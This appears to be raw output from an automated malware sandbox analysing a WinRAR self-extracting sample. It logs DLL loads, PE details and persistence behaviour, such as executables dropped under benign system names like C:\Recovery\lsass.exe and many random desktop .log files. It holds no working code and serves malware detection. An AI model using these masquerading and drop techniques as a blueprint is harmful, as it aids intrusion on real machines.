Source: C:\Recovery\lsass.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\lsass.exe	Section loaded: winnsi.dll
Source: C:\Recovery\lsass.exe	Section loaded: rasadhlp.dll
Source: C:\Recovery\lsass.exe	Section loaded: fwpuclnt.dll
Source: C:\Recovery\lsass.exe	Section loaded: propsys.dll
Source: C:\Recovery\lsass.exe	Section loaded: apphelp.dll
Source: C:\Recovery\lsass.exe	Section loaded: dlnashext.dll
Source: C:\Recovery\lsass.exe	Section loaded: wpdshext.dll
Source: C:\Recovery\lsass.exe	Section loaded: edputil.dll
Source: C:\Recovery\lsass.exe	Section loaded: urlmon.dll
Source: C:\Recovery\lsass.exe	Section loaded: iertutil.dll
Source: C:\Recovery\lsass.exe	Section loaded: srvcli.dll
Source: C:\Recovery\lsass.exe	Section loaded: netutils.dll
Source: C:\Recovery\lsass.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Recovery\lsass.exe	Section loaded: wintypes.dll
Source: C:\Recovery\lsass.exe	Section loaded: appresolver.dll
Source: C:\Recovery\lsass.exe	Section loaded: bcp47langs.dll
Source: C:\Recovery\lsass.exe	Section loaded: slc.dll
Source: C:\Recovery\lsass.exe	Section loaded: userenv.dll
Source: C:\Recovery\lsass.exe	Section loaded: sppc.dll
Source: C:\Recovery\lsass.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Recovery\lsass.exe	Section loaded: mscoree.dll
Source: C:\Recovery\lsass.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\lsass.exe	Section loaded: version.dll
Source: C:\Recovery\lsass.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\lsass.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\lsass.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\lsass.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\lsass.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\lsass.exe	Section loaded: wldp.dll
Source: C:\Recovery\lsass.exe	Section loaded: profapi.dll
Source: C:\Recovery\lsass.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\lsass.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\lsass.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\lsass.exe	Section loaded: sspicli.dll
Source: C:\Recovery\lsass.exe	Section loaded: ktmw32.dll
Source: C:\Recovery\lsass.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\lsass.exe	Section loaded: rasman.dll
Source: C:\Recovery\lsass.exe	Section loaded: rtutils.dll
Source: C:\Recovery\lsass.exe	Section loaded: mswsock.dll
Source: C:\Recovery\lsass.exe	Section loaded: winhttp.dll
Source: C:\Recovery\lsass.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\lsass.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\lsass.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\lsass.exe	Section loaded: dhcpcsvc.dll
Source: C:\Recovery\lsass.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\lsass.exe	Section loaded: winnsi.dll
Source: C:\Recovery\lsass.exe	Section loaded: rasadhlp.dll
Source: C:\Recovery\lsass.exe	Section loaded: fwpuclnt.dll
Source: C:\Recovery\lsass.exe	Section loaded: propsys.dll
Source: C:\Recovery\lsass.exe	Section loaded: apphelp.dll
Source: C:\Recovery\lsass.exe	Section loaded: dlnashext.dll
Source: C:\Recovery\lsass.exe	Section loaded: wpdshext.dll
Source: C:\Recovery\lsass.exe	Section loaded: edputil.dll
Source: C:\Recovery\lsass.exe	Section loaded: urlmon.dll
Source: C:\Recovery\lsass.exe	Section loaded: iertutil.dll
Source: C:\Recovery\lsass.exe	Section loaded: srvcli.dll
Source: C:\Recovery\lsass.exe	Section loaded: netutils.dll
Source: C:\Recovery\lsass.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Recovery\lsass.exe	Section loaded: wintypes.dll
Source: C:\Recovery\lsass.exe	Section loaded: appresolver.dll
Source: C:\Recovery\lsass.exe	Section loaded: bcp47langs.dll
Source: C:\Recovery\lsass.exe	Section loaded: slc.dll
Source: C:\Recovery\lsass.exe	Section loaded: userenv.dll
Source: C:\Recovery\lsass.exe	Section loaded: sppc.dll
Source: C:\Recovery\lsass.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Recovery\lsass.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\lsass.exe	Section loaded: mscoree.dll
Source: C:\Recovery\lsass.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\lsass.exe	Section loaded: version.dll
Source: C:\Recovery\lsass.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\lsass.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\lsass.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\lsass.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\lsass.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\lsass.exe	Section loaded: wldp.dll
Source: C:\Recovery\lsass.exe	Section loaded: profapi.dll
Source: C:\Recovery\lsass.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\lsass.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\lsass.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\lsass.exe	Section loaded: sspicli.dll
Source: C:\Recovery\lsass.exe	Section loaded: ktmw32.dll
Source: C:\Recovery\lsass.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\lsass.exe	Section loaded: rasman.dll
Source: C:\Recovery\lsass.exe	Section loaded: rtutils.dll
Source: C:\Recovery\lsass.exe	Section loaded: mswsock.dll
Source: C:\Recovery\lsass.exe	Section loaded: winhttp.dll
Source: C:\Recovery\lsass.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\lsass.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\lsass.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\lsass.exe	Section loaded: dhcpcsvc.dll
Source: C:\Recovery\lsass.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\lsass.exe	Section loaded: winnsi.dll
Source: C:\Recovery\lsass.exe	Section loaded: rasadhlp.dll
Source: C:\Recovery\lsass.exe	Section loaded: fwpuclnt.dll
Source: C:\Recovery\lsass.exe	Section loaded: propsys.dll
Source: C:\Recovery\lsass.exe	Section loaded: apphelp.dll
Source: C:\Recovery\lsass.exe	Section loaded: dlnashext.dll
Source: C:\Recovery\lsass.exe	Section loaded: wpdshext.dll
Source: C:\Recovery\lsass.exe	Section loaded: edputil.dll
Source: C:\Recovery\lsass.exe	Section loaded: urlmon.dll
Source: C:\Recovery\lsass.exe	Section loaded: iertutil.dll
Source: C:\Recovery\lsass.exe	Section loaded: srvcli.dll
Source: C:\Recovery\lsass.exe	Section loaded: netutils.dll
Source: C:\Recovery\lsass.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Recovery\lsass.exe	Section loaded: wintypes.dll
Source: C:\Recovery\lsass.exe	Section loaded: appresolver.dll
Source: C:\Recovery\lsass.exe	Section loaded: bcp47langs.dll
Source: C:\Recovery\lsass.exe	Section loaded: slc.dll
Source: C:\Recovery\lsass.exe	Section loaded: userenv.dll
Source: C:\Recovery\lsass.exe	Section loaded: sppc.dll
Source: C:\Recovery\lsass.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Recovery\lsass.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\lsass.exe	Section loaded: mscoree.dll
Source: C:\Recovery\lsass.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\lsass.exe	Section loaded: version.dll
Source: C:\Recovery\lsass.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\lsass.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\lsass.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\lsass.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\lsass.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\lsass.exe	Section loaded: wldp.dll
Source: C:\Recovery\lsass.exe	Section loaded: profapi.dll
Source: C:\Recovery\lsass.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\lsass.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\lsass.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\lsass.exe	Section loaded: sspicli.dll
Source: C:\Recovery\lsass.exe	Section loaded: ktmw32.dll
Source: C:\Recovery\lsass.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\lsass.exe	Section loaded: rasman.dll
Source: C:\Recovery\lsass.exe	Section loaded: rtutils.dll
Source: C:\Recovery\lsass.exe	Section loaded: mswsock.dll
Source: C:\Recovery\lsass.exe	Section loaded: winhttp.dll
Source: C:\Recovery\lsass.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\lsass.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\lsass.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\lsass.exe	Section loaded: dhcpcsvc.dll
Source: C:\Recovery\lsass.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\lsass.exe	Section loaded: winnsi.dll
Source: C:\Recovery\lsass.exe	Section loaded: rasadhlp.dll
Source: C:\Recovery\lsass.exe	Section loaded: fwpuclnt.dll
Source: C:\Recovery\lsass.exe	Section loaded: propsys.dll
Source: C:\Recovery\lsass.exe	Section loaded: apphelp.dll

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Directory created: C:\Program Files\Windows Portable Devices\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Directory created: C:\Program Files\Windows Portable Devices\6e82e733a89f1e	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Directory created: C:\Program Files\Microsoft Office 15\ClientX64\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Directory created: C:\Program Files\Microsoft Office 15\ClientX64\6e82e733a89f1e	Jump to behavior

Source: Qsi7IgkrWa.exe

Static file information: File size 2470804 > 1048576

Source: Qsi7IgkrWa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Qsi7IgkrWa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Qsi7IgkrWa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Qsi7IgkrWa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Qsi7IgkrWa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Qsi7IgkrWa.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Qsi7IgkrWa.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: Qsi7IgkrWa.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Qsi7IgkrWa.exe

Source: Qsi7IgkrWa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Qsi7IgkrWa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Qsi7IgkrWa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Qsi7IgkrWa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Qsi7IgkrWa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

File created: C:\HypercontainerServerhostDll\__tmp_rar_sfx_access_check_4629265

Jump to behavior

Source: Qsi7IgkrWa.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BCF640 push ecx; ret	0_2_00BCF653
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BCEB78 push eax; ret	0_2_00BCEB96
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Code function: 4_2_00007FFD9BC07157 pushad ; iretd	4_2_00007FFD9BC0715D
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Code function: 4_2_00007FFD9BC03A9E push ecx; iretd	4_2_00007FFD9BC03AA4
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Code function: 4_2_00007FFD9BE9DED1 push ecx; iretd	4_2_00007FFD9BE9DED2
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Code function: 4_2_00007FFD9BE9753F push ebx; iretd	4_2_00007FFD9BE9756A
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Code function: 4_2_00007FFD9BE9B4F7 push FFFFFF8Eh; ret	4_2_00007FFD9BE9B504
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Code function: 4_2_00007FFD9BE960B6 push esp; retf	4_2_00007FFD9BE960B9
Source: C:\Recovery\lsass.exe	Code function: 10_2_00007FFD9BBF7157 pushad ; iretd	10_2_00007FFD9BBF715D
Source: C:\Recovery\lsass.exe	Code function: 10_2_00007FFD9BBF3A9E push ecx; iretd	10_2_00007FFD9BBF3AA4
Source: C:\Recovery\lsass.exe	Code function: 10_2_00007FFD9BE860B6 push esp; retf	10_2_00007FFD9BE860B9
Source: C:\Recovery\lsass.exe	Code function: 10_2_00007FFD9BE87D9D pushfd ; ret	10_2_00007FFD9BE87D9F
Source: C:\Recovery\lsass.exe	Code function: 10_2_00007FFD9BE884FE push ebx; retf	10_2_00007FFD9BE88500
Source: C:\Recovery\lsass.exe	Code function: 10_2_00007FFD9BE8AC88 push eax; iretd	10_2_00007FFD9BE8ACA9
Source: C:\Recovery\lsass.exe	Code function: 10_2_00007FFD9BE8AC80 push eax; iretd	10_2_00007FFD9BE8ACA9
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BAD616F push cs; ret	17_2_00007FFD9BAD617F
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BAD8158 push ebx; ret	17_2_00007FFD9BAD816A
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BAD8150 push ebx; ret	17_2_00007FFD9BAD816A
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BAD8148 push ebx; ret	17_2_00007FFD9BAD816A
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BAB612B push eax; ret	17_2_00007FFD9BAB613D
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BAB289F push eax; retf	17_2_00007FFD9BAB293D
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BC07157 pushad ; iretd	17_2_00007FFD9BC0715D
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BC03A9E push ecx; iretd	17_2_00007FFD9BC03AA4
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BE960B6 push esp; retf	17_2_00007FFD9BE960B9
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BE97D9D pushfd ; ret	17_2_00007FFD9BE97D9F
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BE984FE push ebx; retf	17_2_00007FFD9BE98500
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BE9AC88 push eax; iretd	17_2_00007FFD9BE9ACA9
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BE9AC80 push eax; iretd	17_2_00007FFD9BE9ACA9
Source: C:\Recovery\lsass.exe	Code function: 22_2_00007FFD9BC17157 pushad ; iretd	22_2_00007FFD9BC1715D
Source: C:\Recovery\lsass.exe	Code function: 22_2_00007FFD9BC13A9E push ecx; iretd	22_2_00007FFD9BC13AA4
Source: C:\Recovery\lsass.exe	Code function: 22_2_00007FFD9BEA60AC push esp; retf	22_2_00007FFD9BEA60B9

Source: ComponentBrowserruntimeHostNet.exe.0.dr	Static PE information: section name: .text entropy: 7.541810901864749
Source: ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe.4.dr	Static PE information: section name: .text entropy: 7.541810901864749
Source: ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe0.4.dr	Static PE information: section name: .text entropy: 7.541810901864749
Source: lsass.exe.4.dr	Static PE information: section name: .text entropy: 7.541810901864749
Source: TextInputHost.exe.4.dr	Static PE information: section name: .text entropy: 7.541810901864749
Source: ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe1.4.dr	Static PE information: section name: .text entropy: 7.541810901864749

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe

File created: C:\Recovery\lsass.exe

Jump to dropped file

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File created: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\whSGRYvh.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\CmKYhHkf.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\HInMzsNO.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\oZQzjlbX.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\CYkgyfvY.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\XVlEhDHN.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\EaXPTOzT.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\LkfFbrxk.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\dhGiqFYl.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\brdjWOxr.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\JeCeCscc.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\qjmAjDHY.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\RIKTmlsJ.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\nDKQhfgz.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\GQmWAABO.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\icHKrlAV.log	Jump to dropped file
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File created: C:\Users\user\Desktop\iAcIGVjp.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\MtSmEjDp.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\kwMHLMmE.log	Jump to dropped file
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	File created: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Jump to dropped file
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File created: C:\HypercontainerServerhostDll\TextInputHost.exe	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\QrHcjUSw.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\CKyWUHyH.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\gVSkXNZP.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\nPayaidT.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\gvHJzrMq.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\reDyPeef.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\ryfhxvpx.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\heJamQmd.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\vXhOtgDl.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\AsWoiMty.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\gtMhCYIK.log	Jump to dropped file
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File created: C:\Users\user\Desktop\AFUvvHdz.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\XmyUnkUi.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\uhqhlNja.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\MhHNxrMf.log	Jump to dropped file
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File created: C:\Users\user\Desktop\PgRkIPoV.log	Jump to dropped file
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File created: C:\Recovery\lsass.exe	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\phNJAZcc.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\YBBlCWWw.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\UynSGdTD.log	Jump to dropped file
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File created: C:\Users\user\Desktop\ZPkAsstD.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\tIBixNUy.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\UKBLugCN.log	Jump to dropped file
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File created: C:\Program Files\Windows Portable Devices\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	Jump to dropped file
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File created: C:\Program Files\Microsoft Office 15\ClientX64\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\FrxXNAmm.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\TBLKldEI.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\QXsvSdGP.log	Jump to dropped file

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File created: C:\Users\user\Desktop\iAcIGVjp.log	Jump to dropped file
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File created: C:\Users\user\Desktop\AFUvvHdz.log	Jump to dropped file
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File created: C:\Users\user\Desktop\ZPkAsstD.log	Jump to dropped file
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	File created: C:\Users\user\Desktop\PgRkIPoV.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\vXhOtgDl.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\gtMhCYIK.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\QrHcjUSw.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\HInMzsNO.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\TBLKldEI.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\nPayaidT.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\dhGiqFYl.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\UynSGdTD.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\kwMHLMmE.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\GQmWAABO.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\whSGRYvh.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\nDKQhfgz.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\AsWoiMty.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\brdjWOxr.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\RIKTmlsJ.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\JeCeCscc.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\reDyPeef.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\MtSmEjDp.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\CKyWUHyH.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\uhqhlNja.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\FrxXNAmm.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\heJamQmd.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\YBBlCWWw.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\QXsvSdGP.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\CYkgyfvY.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\gVSkXNZP.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\XmyUnkUi.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\EaXPTOzT.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\UKBLugCN.log	Jump to dropped file
Source: C:\Recovery\lsass.exe	File created: C:\Users\user\Desktop\qjmAjDHY.log	Jump to dropped file
